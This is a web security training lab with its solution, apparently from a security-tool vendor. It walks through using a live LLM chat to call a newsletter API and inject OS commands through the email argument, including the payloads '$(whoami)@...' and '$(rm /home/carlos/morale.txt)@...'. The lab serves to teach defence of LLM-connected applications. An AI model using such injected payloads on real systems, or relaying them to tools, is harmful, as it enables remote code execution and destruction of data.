Burp Suite Enterprise Edition is now available in our secure Cloud  –  Learn more

Lab: Exploiting vulnerabilities in LLM APIs


This lab contains an OS command injection vulnerability that can be exploited via its APIs. You can call these APIs via the LLM. To solve the lab, delete the morale.txt file from Carlos' home directory.

Required knowledge

To solve this lab, you'll need to know:



Our Web LLM attacks labs use a live LLM. While we have tested the solutions to these labs extensively, we cannot guarantee how the live chat feature will respond in any given situation due to the unpredictable nature of LLM responses. You may sometimes need to rephrase your prompts or use a slightly different process to solve the lab.

  1. From the lab homepage, click Live chat.

  2. Ask the LLM what APIs it has access to. The LLM responds that it can access APIs controlling the following functions:

    • Password Reset
    • Newsletter Subscription
    • Product Information
  3. Consider the following points:

    • You will probably need remote code execution to delete Carlos' morale.txt file. APIs that send emails sometimes use operating system commands that offer a pathway to RCE.
    • You don't have an account so testing the password reset will be tricky. The Newsletter Subscription API is a better initial testing target.
  4. Ask the LLM what arguments the Newsletter Subscription API takes.

  5. Ask the LLM to call the Newsletter Subscription API with the argument attacker@YOUR-EXPLOIT-SERVER-ID.exploit-server.net.

  6. Click Email client and observe that a subscription confirmation has been sent to the email address as requested. This proves that you can use the LLM to interact with the Newsletter Subscription API directly.

  7. Ask the LLM to call the Newsletter Subscription API with the argument $(whoami)@YOUR-EXPLOIT-SERVER-ID.exploit-server.net.

  8. Click Email client and observe that the resulting email was sent to carlos@YOUR-EXPLOIT-SERVER-ID.exploit-server.net. This suggests that the whoami command was executed successfully, indicating that remote code execution is possible.

  9. Ask the LLM to call the Newsletter Subscription API with the argument $(rm /home/carlos/morale.txt)@YOUR-EXPLOIT-SERVER-ID.exploit-server.net. The resulting API call causes the system to delete Carlos' morale.txt file, solving the lab.


The LLM may respond with "something went wrong" or a similar error after the final API call. This is expected behavior and should not impact the solution of the lab itself.